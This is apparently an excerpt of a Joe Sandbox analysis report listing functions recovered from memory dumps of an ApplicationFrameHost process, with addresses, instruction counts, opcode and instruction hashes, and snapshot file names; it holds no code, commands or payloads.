                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 00824e5838731c44b5c43462efd30fdea2b9becd264f405d9f3597f0843a589c
                                                                                                                                  • Instruction ID: 2dd7f7a4d5271ef2d76df14353dbe78560a3181cfb436ef0e98cf8166bf58672
                                                                                                                                  • Opcode Fuzzy Hash: 00824e5838731c44b5c43462efd30fdea2b9becd264f405d9f3597f0843a589c
                                                                                                                                  • Instruction Fuzzy Hash: 8AF0B43091C41A4FE698F708D8417F83392EF88391F1001BADC4ED31D6DE287D458A49
                                                                                                                                  Function 00007FF848F474D5 Relevance: .0, Instructions: 30COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4ef4df60666764e8ad5ef5ba56f80aa03f855ee95e4d2dd54c9b970a72a77fca
                                                                                                                                  • Instruction ID: 9636b40108a77803920417cd08440785f2287ee27c131d68e53ed17345dc5793
                                                                                                                                  • Opcode Fuzzy Hash: 4ef4df60666764e8ad5ef5ba56f80aa03f855ee95e4d2dd54c9b970a72a77fca
                                                                                                                                  • Instruction Fuzzy Hash: EEE06D62A0EA885FE30A2A385C354B03F919F6A666B5A04A7D04ACB6F3DE159D498311
                                                                                                                                  Function 00007FF848F12491 Relevance: .0, Instructions: 30COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f10000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d5968893ecb5427b386e93c046534834a8591e0469f943bd446145fcc0b511b4
                                                                                                                                  • Instruction ID: e21155e57d60be06883fa2588cf562fba36d21cbe8d5c4c0187f7596ce99944b
                                                                                                                                  • Opcode Fuzzy Hash: d5968893ecb5427b386e93c046534834a8591e0469f943bd446145fcc0b511b4
                                                                                                                                  • Instruction Fuzzy Hash: AEE03931E0D92B9EF6A0B718C044AB92282EB98790F140276D80DC32D6DE286C818789
                                                                                                                                  Function 00007FF848F10CCD Relevance: .0, Instructions: 28COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f10000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 736979b4b009999fb3234f9f43bc6de9c3e6e46662cc250983b5f430d00a0c1f
                                                                                                                                  • Instruction ID: ce15536fe4407f626b43e936b9cf5c3b5338e9becff4dd2fdad54ceab15aa0e3
                                                                                                                                  • Opcode Fuzzy Hash: 736979b4b009999fb3234f9f43bc6de9c3e6e46662cc250983b5f430d00a0c1f
                                                                                                                                  • Instruction Fuzzy Hash: D9F03A31E0C61A9EE744FB2884956B9B6E0FB99391F5445B9D409D22C5DB3869808B44
                                                                                                                                  Function 00007FF848F47484 Relevance: .0, Instructions: 25COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 54f8cb1a28f457e95d7c2066b1d152c150a537942314deb6ef96a5c55febdeb7
                                                                                                                                  • Instruction ID: 8ce4e897f3485f8ebaf00625e68289e163afb56d01501f04d4ef64444d5bcff0
                                                                                                                                  • Opcode Fuzzy Hash: 54f8cb1a28f457e95d7c2066b1d152c150a537942314deb6ef96a5c55febdeb7
                                                                                                                                  • Instruction Fuzzy Hash: B0E0C93588E7C48FC74B9B7488648657F70EE17611B4A84EFD1898F1E3EA299849C712
                                                                                                                                  Function 00007FF848F11E76 Relevance: .0, Instructions: 25COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f10000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f87b5adaadae1e110fe74a78f71ed565097b627d1191291c68bc6ed501da6b28
                                                                                                                                  • Instruction ID: 4f302a02fbbaa2e4bdd2287b36e040d97009b3a48091b13f844cc6e8bf0fe8d7
                                                                                                                                  • Opcode Fuzzy Hash: f87b5adaadae1e110fe74a78f71ed565097b627d1191291c68bc6ed501da6b28
                                                                                                                                  • Instruction Fuzzy Hash: 07E04F31E4D92B5EF6D4F71CC044AB522D2EB98750F100176D40CC32D6DE286C828385
                                                                                                                                  Function 00007FF848F255E0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f20000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 74b74c1448b6106a7ca8c65923d3da8ae0081f61a34d19dfec3108c03968521a
                                                                                                                                  • Instruction ID: 04808f1501e11cf19b8034038643779121d1da5bb3e2932c280293bf24fa1b6a
                                                                                                                                  • Opcode Fuzzy Hash: 74b74c1448b6106a7ca8c65923d3da8ae0081f61a34d19dfec3108c03968521a
                                                                                                                                  • Instruction Fuzzy Hash: 9CD05E30B609094B8B4CB62D8458570B3D1FBAA2067945279D44BC2281ED25ECC68B84
                                                                                                                                  Function 00007FF848F4D5F9 Relevance: .0, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 81db87196b3860247064661f720e994e97c05a29d1b6737302ed5ee17d96c38b
                                                                                                                                  • Instruction ID: 4695a7dde45e81d8737b0db020c57983586e3bf6fd5280038208243fbb839c9e
                                                                                                                                  • Opcode Fuzzy Hash: 81db87196b3860247064661f720e994e97c05a29d1b6737302ed5ee17d96c38b
                                                                                                                                  • Instruction Fuzzy Hash: 7EE01A6184E7C04FC74B973588798547F70DE2721174A40EFC089CF1A3E62E9849C711
                                                                                                                                  Function 00007FF848F4D574 Relevance: .0, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 295636fd734d265c17a3d2cf5b80eccea1294c84115078c5e14b7a90b03ce7a0
                                                                                                                                  • Instruction ID: fd1e72c1a0fa10657a5765cf96b33e6eef78fb074f5ad48c6f96c2cac1aebb32
                                                                                                                                  • Opcode Fuzzy Hash: 295636fd734d265c17a3d2cf5b80eccea1294c84115078c5e14b7a90b03ce7a0
                                                                                                                                  • Instruction Fuzzy Hash: 95E0E53188F7C04FC74BA73488788957FB0EE5721474A80EFC1858B1A3EA29984EC702
                                                                                                                                  Function 00007FF848F4A010 Relevance: .0, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                                  • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                                  • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                                  • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                                  Function 00007FF848F4A0E0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                                  • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                                  • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                                  • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                                  Function 00007FF848F16F01 Relevance: .0, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f10000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fc7094eeb4794d424b703d3708d3935327f2967980bb3fc0de8692a787a54a96
                                                                                                                                  • Instruction ID: 03c21a4d4784ac629fcd01221c2394cc79718dc2bab59c75439b25b0c056a93b
                                                                                                                                  • Opcode Fuzzy Hash: fc7094eeb4794d424b703d3708d3935327f2967980bb3fc0de8692a787a54a96
                                                                                                                                  • Instruction Fuzzy Hash: 64E01A30E0C1268EF755B358C8613A97265EB88380F541078D94E973C2DF28AE45860D
                                                                                                                                  Function 00007FF848F41DF0 Relevance: .0, Instructions: 18COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                                  • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                                  • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                                  • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                                  Function 00007FF848F23B50 Relevance: .0, Instructions: 18COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f20000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                                  • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                                  • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                                  • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                                  Function 00007FF848F46A48 Relevance: .0, Instructions: 17COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d6558226e1d204dd9950edc57c170070aab54c17200b384f8648621a757cc033
                                                                                                                                  • Instruction ID: 4661ccaf1b58df98848ab522b94a707e03a8532b678701af8c9339d56787af69
                                                                                                                                  • Opcode Fuzzy Hash: d6558226e1d204dd9950edc57c170070aab54c17200b384f8648621a757cc033
                                                                                                                                  • Instruction Fuzzy Hash: 0CD02230B58C044FC70CB73888488303390EB6A216BD000A9D00AC72B1EA2ADC88C740
                                                                                                                                  Function 00007FF848F4B3B8 Relevance: .0, Instructions: 17COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 415f7d0de073e2668e6d5afe974929b12247d147b0922ce743488fbb5b2e585e
                                                                                                                                  • Instruction ID: 76ea12a6034526ff4a6ced1086d89588ef5681ba85334217affdd9d4de6ab827
                                                                                                                                  • Opcode Fuzzy Hash: 415f7d0de073e2668e6d5afe974929b12247d147b0922ce743488fbb5b2e585e
                                                                                                                                  • Instruction Fuzzy Hash: E2D01234B559044FC70CB73C88598747391EB6E61AB9544A9D00AD72B1EE6ADC89C741
                                                                                                                                  Function 00007FF848F247CB Relevance: .0, Instructions: 16COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f20000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 599494de099cac5bfe02c57f5e29e130c2e799877381b499fdf14ad4b37f5704
                                                                                                                                  • Instruction ID: e1355f4837939f58bee4b97693a89667c1f23e1d18f0219bae9945e55761fc19
                                                                                                                                  • Opcode Fuzzy Hash: 599494de099cac5bfe02c57f5e29e130c2e799877381b499fdf14ad4b37f5704
                                                                                                                                  • Instruction Fuzzy Hash: 40D09E30D1C95B4FE695BF18A8407F961A0BF19380F510475E42DC31C6DF69ED119A59
                                                                                                                                  Function 00007FF848F1085D Relevance: .0, Instructions: 14COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f10000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 28d46ec8f6734d0c972d30e0222444d7b239de2724329f2d889af5c15fc7c3cb
                                                                                                                                  • Instruction ID: 0ba04314d444de1b38a17f0f7700764e6c7a19447d88d1fccd9b7790b84b9593
                                                                                                                                  • Opcode Fuzzy Hash: 28d46ec8f6734d0c972d30e0222444d7b239de2724329f2d889af5c15fc7c3cb
                                                                                                                                  • Instruction Fuzzy Hash: 87C08C346148088FCA08FB2DC88580833A0FB0A310BC200E0E00CC71B1E219DCC2CB41
                                                                                                                                  Function 00007FF848F10B9D Relevance: .0, Instructions: 14COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f10000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                                                                                                  • Instruction ID: 8e3f090ec98a18358b19f230978796e7dde748cba2070448f6823685d23cde85
                                                                                                                                  • Opcode Fuzzy Hash: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                                                                                                  • Instruction Fuzzy Hash: B6C0123062980E8FDA40BB28C889824BBA0FB0E302BD900E0E00CC71A1D629A8908704
                                                                                                                                  Function 00007FF848F106A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f10000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 643015e1c7310c5d1a56e7e1db4f7d8a6ab91577b56fde5bd677069fa0ac72df
                                                                                                                                  • Instruction ID: 0f4ab1da189774152a9bbc32191f72b7a891135fe6eeddd7824fb44c75d1819a
                                                                                                                                  • Opcode Fuzzy Hash: 643015e1c7310c5d1a56e7e1db4f7d8a6ab91577b56fde5bd677069fa0ac72df
                                                                                                                                  • Instruction Fuzzy Hash: 0DC08C20D1E42B08F400B32E14420ACA1005BC8390FD40033D80C401C1AE0D28D5014E
                                                                                                                                  Function 00007FF848F16D1F Relevance: .0, Instructions: 11COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f10000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a9022ec881839d03ad748ecc7b1454e6ca87d1b484c4db8c76754000edc95297
                                                                                                                                  • Instruction ID: 42610d5d8691e745d66c76fbd98b41d95663c52e69c349bb42e47eddb0d3be02
                                                                                                                                  • Opcode Fuzzy Hash: a9022ec881839d03ad748ecc7b1454e6ca87d1b484c4db8c76754000edc95297
                                                                                                                                  • Instruction Fuzzy Hash: FEC00234E2C92A4FEAD9B37480662BD51C5AFA9380F441574E80ED36C7EE2D6C404A48
                                                                                                                                  Function 00007FF848F12BEB Relevance: .0, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f10000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0cce01775264d9d3d510c83aac5e69b8f5b8262ccfbf293aadfb49e74ac1ee41
                                                                                                                                  • Instruction ID: 07a26b154d81799276c35f71996f71098c51ab0f53f9aa00330dd035a26e4bd0
                                                                                                                                  • Opcode Fuzzy Hash: 0cce01775264d9d3d510c83aac5e69b8f5b8262ccfbf293aadfb49e74ac1ee41
                                                                                                                                  • Instruction Fuzzy Hash: 10C08C10F0E8271AF2157304442137F0802CB40BC4FC00070E40D833CACE4C5E0102CE
                                                                                                                                  Function 00007FF848F106C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f10000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 51005e9a319c078acd7e7f91fb5d88e3f86524efe7ca5d68b5647fc29041d042
                                                                                                                                  • Instruction ID: 60b4547f6db5107f5391bb8b86cbaa8acb0b6afc5e77639c03a15d1af411ee3a
                                                                                                                                  • Opcode Fuzzy Hash: 51005e9a319c078acd7e7f91fb5d88e3f86524efe7ca5d68b5647fc29041d042
                                                                                                                                  • Instruction Fuzzy Hash: 63B01210C6E40F04E444337B089206470405B8C344FC40070D80C402C19A4D18A4024A